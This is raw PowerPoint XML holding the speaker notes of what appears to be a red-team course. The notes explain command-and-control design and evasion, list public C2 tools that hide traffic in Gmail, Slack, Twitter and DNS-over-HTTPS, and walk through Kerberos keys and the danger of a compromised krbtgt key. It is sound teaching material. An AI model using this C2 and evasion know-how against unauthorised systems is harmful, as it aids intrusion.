            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1254629478"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr marL="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1pPr>
    <a:lvl2pPr marL="117475" indent="52388"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2pPr>
    <a:lvl3pPr marL="169863" indent="169863"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3pPr>
    <a:lvl4pPr marL="509588" indent="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4pPr>
    <a:lvl5pPr marL="1828800" indent="-1136650" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:spcAft>
        <a:spcPts val="800"/>
      </a:spcAft>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2DDA4B1C-233C-AEC4-ACCA-9A58A5EE23A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348963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module introduces some of the concepts around command and control. We want to gain and maintain control in the target environment.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362589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defTabSz="914266">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The most fundamental aspect of a command-and-control framework is how the implants communicate with the C2 server. In a typical setup we will need a listener (an open port) that receives connections from the client (the implant). In most mature organizations, a company proxy might prevent establishing successful communications. As a result it is important to pick a C2 framework that is proxy aware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914266">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914266">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>In a mature red team, you typically don’t want to overextend your infrastructure into a single point of failure. This is why we segment red team infrastructure in different tiers based on functionality. More of this is covered in the various OPSEC modules in SEC565.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3031675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command and control (C2) server is an attacker-controlled system that is used to communicate with implants. These servers act as a command center by serving tasks and retrieving the results for the various implants deployed throughout the target space. Modern C2 servers use asynchronous communications in order to keep a lower network footprint and avoid detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are a variety of C3, or custom command and control, frameworks and within each, a variety of methods to establish network communication or channels. We will discuss a few of those methods and focus on the more popular ones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://attack.mitre.org/tactics/TA0011/</a:t>
            </a:r>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44851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defTabSz="914266">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red teams may use a variety of methods to establish and maintain C2 communications. We will discuss the popular channels in further detail, but there are several creative techniques that are worth mentioning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171425" indent="-171425">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Developed by Marcello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Salvati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (@byt3bl33d3r), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a Python-based backdoor that uses Gmail as a C2 server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171425" indent="-171425">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google_socks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Developed by Luke Baggett, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google_socks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a script that allows two sockets to communicate while relaying data through Google Drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171425" indent="-171425">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Slackor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Coalfire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Slackor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a Golang implant that uses Slack as a command and control channel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171425" indent="-171425">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Twittor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Developed by @PaulWebSec, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Twittor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a Python backdoor that uses Twitter direct messages as a command and control server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171425" indent="-171425">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>godoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SensePost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Command and Control framework, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>godoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is written in Golang and uses DNS-over-HTTPS as a transport medium.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>References: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/byt3bl33d3r/gcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/lukebaggett/google_socks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/Coalfire-Research/Slackor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/PaulSec/twittor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/sensepost/godoh</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2791810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3C615-D951-5454-E13D-FF444DF62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AD8AC-1FD5-47EA-072C-D4289F4239C8}"/>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942D4031-D8E6-18A1-F5F7-B04714738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E5D689-FCB8-1482-5902-1827C0D559A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222079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6621-83F4-9C92-DE52-768A7C769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C2D8E-7628-CFBB-0F38-D0812F18598F}"/>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B872C841-FFD6-3482-0477-BFC76FAB63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FA0B3-35AD-2A30-4EBD-E8F267241C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62277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23D0B-8A85-CF0F-BCA7-BA4DAFC8A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886A7-B2F8-D29C-842A-18956A59D64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C46C178D-1942-74CA-665C-52624C4FF759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This area is intentionally left blank.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C696B2-5659-C402-6E16-02881FB8728D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179191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3F52-9C54-69C6-A2B2-92E21B484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3744C-B0E2-3809-19E3-CBA0EB145D9A}"/>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7D7CB8A0-E2C8-AC03-B80B-8BEE68B5261D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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A0385D08-CB50-9D8A-C8B2-A7AF1D567D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1561322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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>Allan Marshal tries to authenticate to the system in this diagram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>if you took 599/699, you will recognize this slide as we covered it there as well. It is important that you understand this flow, as this will be the foundation for understanding the different attacks we will discuss in a bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>Allan tries to authenticate with the password Awesomesauce123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>the SSP in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0" err="1"/>
              <a:t>lsass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t> (kerberos.DLL) takes this input and calculates the Kerberos encryption key. This is based on the password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>Kerberos supports different kinds of encryption keys, such as DES, RC4, and AES.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>Two important ticket types here: TGT and service tickets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>TGT is your passport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>it proves you are who you say you are, and with your password, you can request STs. It is a bit like a theme park where the TGT would be your entrance ticket, and in the theme park, you need tickets to ride certain rollercoasters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>We call Kerberos a stateless protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>why? Because it does not keep track of the state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" noProof="0" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>t does not keep track of AS REQ and AS REP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>What happens is that the TGT is proof that authentication has happened before. This is important to understand: the KDC only cares that you have a valid TGT in order to access further resources. It does not matter how you obtained said ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" kern="0" noProof="0" dirty="0"/>
              <a:t>You can compare that a bit with JWT for web applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Reference:</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lang="en-US" sz="1200" i="0" noProof="0" dirty="0"/>
              <a:t>Illustration inspired by "Abusing Microsoft Kerberos - Sorry you guys don't get it," Benjamin Delpy (Blackhat USA 2014)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593121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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three main security keys used throughout the protocol:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The KDC long-term secret key, often called "domain key," is derived from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service account. It is used in Kerberos to encrypt the TGT and sign the PAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client long-term secret key, which is based on the password of the client account. It is used in Kerberos to check the encrypted timestamp (AS-REQ) and encrypt the session key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The target long-term secret key, which is based on the password of the target service. It is used in Kerberos to encrypt the TGS and sign the PAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It should be clear that the compromise of any key represents a security risk. There is, however, one key that is more important than the others: if the KDC long-term secret key is compromised, adversaries can recreate TGTs and sign PACs, which would allow them to obtain all privileges within the domain.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE"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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276544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b="0" i="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966BBFBC-D0AB-7C47-1AFE-E6765052B451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46391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Let's have a look at the initial step here, AS-REQ!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AS-REQ: As an initial step, the client performs pre-authentication by sending an AS-REQ to the KDC (in this case, the AS component of the KDC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> This AS-REQ includes an encrypted version of the timestamp (encrypted using the password hash of the client account), which is validated by the KDC. This "encrypted timestamp" is referred to as "pre-authentication" and is enabled (required) by default in Microsoft Kerberos environments. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
